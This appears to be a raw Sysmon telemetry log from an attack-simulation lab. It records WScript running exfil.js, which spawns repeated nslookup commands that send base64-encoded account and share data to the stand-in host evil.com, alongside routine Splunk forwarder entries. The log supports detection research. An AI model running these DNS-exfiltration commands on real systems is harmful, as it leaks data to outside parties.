Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpdtg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:51.974{A8622C2F-5BB3-6078-590F-00000000AE01}6076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BB3-6078-570F-00000000AE01}2584C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmucmk.tmp 2>&1 154100x800000000000000073372Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:51.945{A8622C2F-5BB3-6078-570F-00000000AE01}2584C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmucmk.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000073321Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:39.534{A8622C2F-5BA7-6078-560F-00000000AE01}5976C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BA7-6078-540F-00000000AE01}4376C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnutw.tmp 2>&1 154100x800000000000000073310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:39.505{A8622C2F-5BA7-6078-540F-00000000AE01}4376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnutw.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073239Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:22.217{A8622C2F-5B96-6078-530F-00000000AE01}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073230Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:21.882{A8622C2F-5B95-6078-520F-00000000AE01}636C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B95-6078-500F-00000000AE01}1348C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > 
C:\Users\ADMINI~1\AppData\Local\Temp\2\nlledqwr.tmp 2>&1 154100x800000000000000073218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:21.854{A8622C2F-5B95-6078-500F-00000000AE01}1348C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlledqwr.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000073205Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:20.647{A8622C2F-5B94-6078-4F0F-00000000AE01}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073192Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:19.965{A8622C2F-5B93-6078-4E0F-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073182Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:19.303{A8622C2F-5B93-6078-4D0F-00000000AE01}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073158Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:17.564{A8622C2F-5B91-6078-4C0F-00000000AE01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073147Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:28:16.897{A8622C2F-5B90-6078-4B0F-00000000AE01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073138Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:16.215{A8622C2F-5B90-6078-4A0F-00000000AE01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073110Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:09.450{A8622C2F-5B89-6078-490F-00000000AE01}3912C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B89-6078-470F-00000000AE01}6268C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlptybq.tmp 2>&1 154100x800000000000000073099Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:09.420{A8622C2F-5B89-6078-470F-00000000AE01}6268C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlptybq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073033Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:51.798{A8622C2F-5B77-6078-460F-00000000AE01}4244C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B77-6078-440F-00000000AE01}920C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaood.tmp 2>&1 154100x800000000000000073022Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:51.768{A8622C2F-5B77-6078-440F-00000000AE01}920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaood.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000072973Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:39.365{A8622C2F-5B6B-6078-430F-00000000AE01}6660C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B6B-6078-410F-00000000AE01}5212C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlihmz.tmp 2>&1 154100x800000000000000072962Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:39.336{A8622C2F-5B6B-6078-410F-00000000AE01}5212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlihmz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072897Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:22.211{A8622C2F-5B5A-6078-400F-00000000AE01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072889Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:21.688{A8622C2F-5B59-6078-3F0F-00000000AE01}5664C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B59-6078-3D0F-00000000AE01}6516C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsio.tmp 2>&1 154100x800000000000000072878Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:21.659{A8622C2F-5B59-6078-3D0F-00000000AE01}6516C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsio.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000072866Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:20.590{A8622C2F-5B58-6078-3C0F-00000000AE01}1348C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072854Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:19.965{A8622C2F-5B57-6078-3B0F-00000000AE01}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072826Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:19.296{A8622C2F-5B57-6078-3A0F-00000000AE01}1796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" 
service 154100x800000000000000072799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:17.468{A8622C2F-5B55-6078-390F-00000000AE01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072788Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:16.894{A8622C2F-5B54-6078-380F-00000000AE01}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072779Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:16.212{A8622C2F-5B54-6078-370F-00000000AE01}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072747Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:09.294{A8622C2F-5B4D-6078-360F-00000000AE01}5344C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B4D-6078-340F-00000000AE01}6868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloavjlz.tmp 2>&1 154100x800000000000000072734Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:09.264{A8622C2F-5B4D-6078-340F-00000000AE01}6868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloavjlz.tmp 
